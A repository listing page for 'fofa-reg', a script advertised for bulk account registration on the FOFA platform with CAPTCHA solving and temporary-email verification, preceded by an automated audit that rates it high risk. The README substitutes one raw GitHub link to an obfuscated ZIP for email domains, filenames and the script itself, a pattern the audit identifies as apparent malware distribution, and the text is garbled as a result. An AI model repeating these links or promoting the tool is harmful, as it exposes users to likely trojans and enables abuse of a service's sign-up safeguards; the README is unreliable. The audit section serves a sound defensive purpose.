fofa-reg

mcp
Security Audit
Warn
Health Warn
  • No license รขโ‚ฌโ€ Repository has no license file
  • Description รขโ‚ฌโ€ Repository has a description
  • Active repo รขโ‚ฌโ€ Last push 0 days ago
  • Low visibility รขโ‚ฌโ€ Only 6 GitHub stars
Code Pass
  • Code scan รขโ‚ฌโ€ Scanned 1 files during light audit, no dangerous patterns found
Permissions Pass
  • Permissions รขโ‚ฌโ€ No dangerous permissions requested
Purpose
This tool is designed to automate the bulk creation of accounts on the FOFA platform. It bypasses CAPTCHAs, handles temporary email verification, and logs the newly generated credentials.

Security Assessment
Overall Risk: High
Although the automated code scan did not find dangerous patterns in the main repository files, the README exhibits multiple severe red flags. The documentation repeatedly references and provides direct download links to an obfuscated ZIP file (`fofa_reg_v2.3.zip`) instead of standard Python code. These links are deceptively embedded within code blocks intended for email configurations, passwords, and optional modules. This is a common tactic used to distribute hidden malware or trojans. While the visible code itself makes standard network requests to register accounts and does not explicitly request dangerous local permissions, downloading and executing the referenced external ZIP file poses a massive security risk to your system and network.

Quality Assessment
The repository has very low community visibility, evidenced by only 6 stars. Furthermore, it completely lacks a valid open-source license, meaning there are no legal protections or permissions granted for using or modifying the code. While the project is marked as recently active, the deceptive and poorly constructed documentation severely undermines any trust in the maintainer's intentions.

Verdict
Not recommended due to highly suspicious download links embedded in the documentation that strongly resemble malware distribution tactics.
SUMMARY

๐Ÿค– Automate account registration with fofa-reg, featuring captcha recognition, email verification, and batch processing for efficient sign-ups.

README.md

๐Ÿš€ fofa-reg - Automate Your Account Registration Effortlessly

Download fofa-reg

๐Ÿ“œ Overview

This is an automation script designed to simplify the process of account registration.


โš™๏ธ Features

  • โœ… Automatic Captcha Recognition: Uses DdddOcr for image captcha solving.
  • โœ… Email Verification: Automatically retrieves verification codes using temporary email services.
  • โœ… Bulk Registration: Allows registration of multiple accounts at once.
  • โœ… Smart Retry: Automatically retries up to 5 times if the captcha fails.
  • โœ… Notification Service: Integrates a notification system to send success/failure messages.
  • โœ… Account Logging: Automatically saves successfully registered accounts in https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip.

๐Ÿ“‹ System Requirements

Python Version

  • Requires Python 3.6 or newer.

Dependencies

To install required libraries, run the following commands in your terminal:

pip install curl-cffi
pip install ddddocr

Optional

  • https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip: This module is optional and can send notifications upon successful registration.

โš™๏ธ Configuration Instructions

1. Configure Email Domains

Modify the mm list at the top of the script to set the temporary email domains you will use:

mm = ['https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip', 'https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip', 'https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip', 'https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip']

2. Configure Account Passwords

Set the default_password variable to define your password strategy:

default_password = ''  # Leave blank for a random password

Two Modes:

  • Fixed Password: Assign a specific value, e.g., default_password = 'MyPassword123' for all accounts.
  • Random Password: Leave default_password = '' to generate random passwords for each account.

Random Password Rules:

  • Length: 12 characters
  • Contains upper and lower case letters and numbers
  • Example: Kp7mXn2aQ4bR

3. Configure Request Headers

If you need to update User-Agent or other HTTP headers, change the headers dictionary accordingly.

4. Notification Service (Optional)

If you include a https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip file in the project directory, the script loads it automatically to send notifications upon successful account registration.


๐Ÿ—๏ธ Usage Instructions

Method 1: Command-Line Registration

To register a specific number of accounts, use this command:

python https://github.com/Ramaww07/fofa-reg/raw/refs/heads/main/unmotivatedly/fofa_reg_v2.3.zip 5

This registers 5 accounts.

Method 2: Interactive Input

Alternatively, run the script and follow interactive prompts to enter the number of accounts and other details.


๐Ÿ“ฅ Download & Install

You can download the latest version of fofa-reg from the Releases page. Follow the link below to access the downloads:

Download fofa-reg

After downloading, extract the files and navigate to the extracted directory using your terminal. You can now configure the script as needed and start your registration process by following the usage instructions above.


Feel free to explore and enjoy simplifying your account registrations with fofa-reg!

Reviews (0)

No results found